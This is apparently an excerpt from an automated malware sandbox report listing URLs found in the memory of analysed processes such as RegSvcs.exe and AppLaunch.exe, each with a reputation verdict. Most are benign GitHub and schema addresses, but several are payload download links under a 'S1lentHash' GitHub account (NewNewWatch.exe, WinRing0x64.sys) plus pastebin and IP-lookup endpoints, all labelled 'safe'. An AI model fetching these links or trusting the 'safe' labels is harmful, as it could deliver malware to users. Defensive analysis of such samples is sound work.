                      http://tempuri.org/Entity/Id21ResponseRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/features/code-reviewAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/featuresAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://user-images.githubusercontent.com/AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/solutions/industries/manufacturingAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id13LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-poAppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://api.github.com/_private/browser/statsAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id5LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000012.00000002.1774355211.0000000005EAA000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id15ResponseRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAppLaunch.exe, 0000000F.00000002.1789091903.0000000006916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1771702120.0000000004E41000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://api.ip.sb/ip4usfliof.exe, 00000004.00000003.1664492512.0000000001272000.00000040.00001000.00020000.00000000.sdmp, 4usfliof.exe, 00000004.00000002.1834530899.00000000009BD000.00000004.00000001.01000000.00000009.sdmp, RegSvcs.exe, 00000006.00000002.2888940061.00000000005A2000.00000020.00000400.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000012.00000002.1771702120.0000000004F96000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000002.1771702120.0000000004F96000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/S1lentHash/newwatch/raw/main/NewNewWatch.exeAppLaunch.exe, 0000000F.00000002.1789091903.000000000698C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/vendors-node_modules_github_selector-observerAppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.jsAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/Iconpowershell.exe, 00000012.00000002.1774355211.0000000005EAA000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://docs.github.com/get-started/accessibility/keyboard-shortcutsAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/element-registry-d1e61f0bd7b5.jsAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/global-9e6d890d55ca.cssAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/features/packagesAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000012.00000002.1771702120.0000000004F96000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_jsAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/site-6a145c5564e7.cssAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_moduAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id14LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id6LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_jsAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressingRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/trendingAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sys&quot;AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000012.00000002.1771702120.0000000004F96000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://pastebin.comAppLaunch.exe, 0000000F.00000002.1789091903.000000000692B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id5ResponseRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://api.github.com/_private/browser/errorsAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/light-3e154969b9f9.cssAppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id10ResponseRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id8ResponseRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id22LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/features/discussionsAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://partner.github.comAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/favicons/favicon.pngAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/github-elements-508a45ca23c6.jsAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sysChttps://pastebin.com/raw/PTNbBXRegSvcs.exe, 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id19LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id7LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id11LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/features/copilotAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.000000000692B000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id13ResponseRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/light_tritanopia-31d17ba3e139.cssAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.comDAppLaunch.exe, 0000000F.00000002.1789091903.000000000698C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nodAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/favicons/favicon.svgAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/ui_packages_onfocus_onfocus_ts-ui_packages_trusted-types-poliAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousRegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/github-e4eed26e112b.cssAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id22ResponseRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/features/codespacesAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://github.comdAppLaunch.exe, 0000000F.00000002.1789091903.000000000698C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/environment-924e60bca7d2.jsAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.comAppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Entity/Id8LRRegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/collectionsAppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmpfalse
